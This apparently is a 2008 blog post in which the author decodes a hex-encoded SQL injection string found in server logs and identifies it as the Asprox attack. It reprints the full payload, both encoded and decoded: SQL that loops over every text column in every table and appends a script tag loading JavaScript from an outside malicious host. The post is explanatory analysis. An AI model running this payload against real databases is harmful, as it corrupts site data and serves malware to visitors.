« Rage Against Unsafe Festival Behavior
St. Kitts highlights »

Hex value sql injection attack.

I just found some errors that looked a little strange. It was obviously a sql injection attack but I couldn’t tell what it was. After the normal parameters I found this:

;DECLARE @S VARCHAR(4000);SET
@S=CAST(0×4445434C41524520405420564152434841522832
3535292C4043205641524348415228323
53529204445434C415245205461626C655F437572736F7
220435552534F5220464F522053454C4543
5420612E6E616D652C622E6E616D652046524F4D2073
79736F626A6563747320612C737973636F6C75
6D6E73206220574845524520612E69643D622E696
420414E4420612E78747970653D27752720414E
442028622E78747970653D3939204F5220622E787
47970653D3335204F5220622E78747970653D323
331204F5220622E78747970653D31363729204F5
0454E205461626C655F437572736F72204645544
348204E4558542046524F4D205461626C655F437
572736F7220494E544F2040542C4043205748494
C4528404046455443485F5354415455533D30292
0424547494E20455845432827555044415445205
B272B40542B275D20534554205B272B40432B275
D3D525452494D28434F4E5645525428564152434
841522834303030292C5B272B40432B275D29292
B27273C736372697074207372633D687474703A2
F2F7777772E6E6362772E72752F6A732E6A733E3C
2F7363726970743E27272729204645544348204E4
558542046524F4D205461626C655F437572736F7
220494E544F2040542C404320454E4420434C4F53
45205461626C655F4 37572736F72204445414C4C
4F43415445205461626C655F437572736F7220
AS VARCHAR(4000));EXEC(@S);

With a little help from:
http://isc.sans.org/diary.html?storyid=4565 and  http://www.eggheadcafe.com/software/aspnet/32646085/sql-injection-gibberish.aspx

I leanred that was hex code that translated to:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype=’u’
AND (b.xtype=99 OR b.xtype=35
OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN EXEC(’UPDATE [’+@T+’] SET [’+@C+’]=RTRIM(CONVERT(VARCHAR(4000),[’+@C+’]))+”<script src=”http://wwwDOTncbwDOTru/jsDOTjs”></script>”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor DEALLOCATE Table_Cursor

More and better info found http://www.dynamoo.com/blog/labels/SQL%20Injection.html

This is called Asprox

Tags:

This entry was posted on Monday, August 4th, 2008 at 8:49 am and is filed under code. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Leave a Reply

You must be logged in to post a comment.